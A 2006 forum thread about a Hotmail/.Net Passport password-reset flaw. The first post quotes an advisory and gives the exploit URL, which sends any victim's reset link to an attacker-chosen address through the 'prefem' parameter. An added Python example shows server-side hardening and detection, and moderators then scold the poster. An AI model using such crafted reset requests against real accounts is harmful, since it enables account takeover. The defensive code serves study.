Password Reset Vulnerability
me-here
post Apr 22 2006, 10:19 AM
Post #1


Is it working now...?

QUOTE
An attacker can reset any Microsoft Hotmail/.Net Passport user account
with no prior information like state, zip, country, answer to the secret
question and the old password. Normally, a user has to answer the
security questions and then answer the secret question if he wants to
reset his password. By exploiting this vulnerability, an attacker can
submit a specially crafted URL to get the password reset instructions
and reset any user's password.

TECHNICAL DETAILS

Due to the nature of this vulnerability and the fact that there is no
fix available yet, no technical details are being made available with
this advisory. Full technical details will be made available on our
website once the vulnerability is fixed by Microsoft. Please note that
we were forced to release this information publicly as these
vulnerabilities are actively being exploited in the wild and are one of
the most severe vulnerabilities ever found in Microsoft Hotmail/.Net
Passport.


The flaw is exploited by opening the following URL in a web browser:

https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst=

After that, the URL which resets the password will be delivered, in this case, to where-to@send-the-email.com.



This post has been edited by me-here: Apr 22 2006, 10:27 AM
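
Added example, not part of the original post or the quoted advisory: a Python illustration of the server-side check that closes this class of flaw, plus a log-side detection for it. It assumes, from the URL above, that the reset mail went to the address in the client-supplied `prefem` parameter; the host, the account store and the function names are constructed for illustration.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed account store: primary address -> alternate address on file.
ACCOUNTS = {"alice@example.com": "alice.backup@example.org"}

def parse_reset_request(url):
    """Return (account, requested_destination) from a reset URL."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)
    account = q.get("em", [""])[0].strip().lower()
    requested = q.get("prefem", [""])[0].strip().lower()
    return account, requested

def reset_destination(url, accounts=ACCOUNTS):
    """Hardened handler logic: mail only to the stored address.

    The client-supplied prefem value is parsed but never used as a target.
    Returns None for an unknown account.
    """
    account, _requested = parse_reset_request(url)
    return accounts.get(account)

def is_redirect_attempt(url, accounts=ACCOUNTS):
    """Detection: the request names a destination that is not on file."""
    account, requested = parse_reset_request(url)
    return bool(requested) and requested != accounts.get(account)

# Constructed sample requests (hypothetical host, not the real endpoint).
BASE = "https://idp.example/reset?lc=1033&em=alice@example.com&id=&cb="
CRAFTED = BASE + "&prefem=mallory@example.net&rst="
BENIGN = BASE + "&prefem=&rst="

if __name__ == "__main__":
    for url in (CRAFTED, BENIGN):
        print(reset_destination(url), is_redirect_attempt(url))
```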
miCRoSCoPiC^eaRt...
post Apr 22 2006, 01:15 PM
Post #2


For God's sake, try and provide SOME ORIGINAL INPUT ON YOUR OWN PART. I'm getting tired of warning you and deleting such posts. Don't you have any goddamned opinion on anything on your own? Or do you simply specialize in posting quoted material from other sites?
jlhaslip
post Apr 22 2006, 10:49 PM
Post #3


O.o, never seen M^E this mad before. Musta really got under his skin...
Logan Deathbring...
post Apr 24 2006, 05:51 AM
Post #4


Yes, the ability to reset a password on the hotmail/msn network is possible, much like the quoted material you posted states. They are currently working on, or have fixed, that problem already. As for how to do it, that's above my knowledge level, or to be more precise, not what I like to do for fun on my evenings off.

As for the post...I have to agree with M^E, of the couple of posts of yours that I have run across they are, umm...Juvenile at best, or in my opinion just this side of spam. Please feel free to contribute to the community, I would love to see you become a strong member here, but please don't post like this anymore, otherwise M^E, Moonwitch, or another of the mods might decide that banning might be the best option.